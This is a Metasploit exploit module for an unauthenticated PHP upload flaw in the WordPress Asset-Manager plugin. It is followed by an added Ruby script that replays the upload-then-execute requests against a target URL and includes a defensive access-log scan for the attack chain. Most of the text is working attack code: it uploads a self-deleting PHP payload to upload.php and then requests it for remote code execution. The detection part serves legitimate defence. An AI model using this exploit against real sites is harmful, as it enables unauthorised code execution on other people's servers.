This Metasploit module exploits a vulnerability found in the WordPress Asset-Manager plugin, version 2.0 and below. The plugin's upload.php accepts PHP files: an unauthenticated user can upload a file into a temp directory under wp-content/uploads, and requesting that file afterwards results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin. By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"

    # Random filename so the dropped file is not guessable; the PHP stager
    # removes itself after running (:unlink_self).
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self => true)

    # Single multipart part named "Filedata", which is the form field upload.php reads.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    # Step 1: unauthenticated upload to the plugin's upload.php.
    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # upload.php echoes the stored filename back on success.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # Step 2: request the file from the web-accessible temp directory to run it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
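The two-step exchange the module performs (multipart POST of a "Filedata" part to upload.php, then a GET to wp-content/uploads/assets/temp/) is shown below as a stand-alone Ruby script using only the standard library. This is an added example, not part of the original page or the Metasploit module: the helper names (build_upload_body, upload_succeeded?, temp_file_url, send_upload, find_upload_exec_chains) and the sample access-log lines are constructed here for illustration. The success test copies the module's own check (HTTP 200 and the uploaded filename echoed in the body). The last function goes beyond the module and shows the defender's side: flagging, in common-log-format lines, a client that POSTs to upload.php and then fetches a .php file from the temp directory.

```ruby
require 'net/http'
require 'uri'
require 'securerandom'

# Builds the same multipart/form-data body the module sends: one part,
# field name "Filedata", carrying the supplied filename and content.
def build_upload_body(payload_name, content, boundary)
  body  = "--#{boundary}\r\n"
  body << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{payload_name}\"\r\n"
  body << "Content-Type: application/octet-stream\r\n\r\n"
  body << content
  body << "\r\n--#{boundary}--\r\n"
  body
end

# Mirrors the module's success test: HTTP 200 and the stored filename echoed back.
def upload_succeeded?(code, body, payload_name)
  code.to_i == 200 && !body.nil? && body.include?(payload_name)
end

# Web-accessible location of the uploaded file, per the module's second request.
def temp_file_url(base_url, payload_name)
  base_url += '/' unless base_url.end_with?('/')
  "#{base_url}wp-content/uploads/assets/temp/#{payload_name}"
end

# Performs the upload against a live target (not exercised offline).
# Returns true when the response matches the module's success condition.
def send_upload(base_url, payload_name, content)
  base_url += '/' unless base_url.end_with?('/')
  uri = URI("#{base_url}wp-content/plugins/asset-manager/upload.php")
  boundary = SecureRandom.hex(16)
  req = Net::HTTP::Post.new(uri)
  req['Content-Type'] = "multipart/form-data; boundary=#{boundary}"
  req.body = build_upload_body(payload_name, content, boundary)
  res = Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == 'https') { |h| h.request(req) }
  upload_succeeded?(res.code, res.body, payload_name)
end

# Detection side. Common log format assumed; fields: client, method, path, status.
LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(GET|POST) (\S+) [^"]*" (\d{3})/

# Constructed sample log: one real upload-then-execute chain from 10.0.0.5,
# and unrelated requests from 10.0.0.9 that must not be flagged.
SAMPLE_LOG = [
  '10.0.0.5 - - [26/May/2012:10:00:01 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 63',
  '10.0.0.5 - - [26/May/2012:10:00:02 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxm.php HTTP/1.1" 200 12',
  '10.0.0.9 - - [26/May/2012:10:00:03 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 512',
  '10.0.0.9 - - [26/May/2012:10:00:04 +0000] "GET /wordpress/wp-content/uploads/assets/temp/x.php HTTP/1.1" 404 0',
]

# Returns one hash per client that POSTed to upload.php and later requested
# a .php file under uploads/assets/temp/.
def find_upload_exec_chains(lines)
  uploaders = {}
  hits = []
  lines.each do |line|
    m = LOG_RE.match(line)
    next unless m
    ip, method, path, status = m.captures
    if method == 'POST' && path.include?('/wp-content/plugins/asset-manager/upload.php')
      uploaders[ip] = true
    elsif method == 'GET' && uploaders[ip] && path =~ %r{/wp-content/uploads/assets/temp/[^/]+\.php}
      hits << { ip: ip, path: path, status: status.to_i }
    end
  end
  hits
end

if __FILE__ == $0
  puts build_upload_body('demo.php', '<?php echo 1; ?>', 'boundary123')
  puts temp_file_url('http://target.example/wordpress', 'demo.php')
  find_upload_exec_chains(SAMPLE_LOG).each { |h| puts "upload->exec chain: #{h.inspect}" }
end
```

send_upload is the only function that touches the network; everything else runs offline, so the body construction, the success check and the log scan can be exercised without a target. The log scan keys on the client address only, so a proxy in front of WordPress will need the X-Forwarded-For value substituted for the first field.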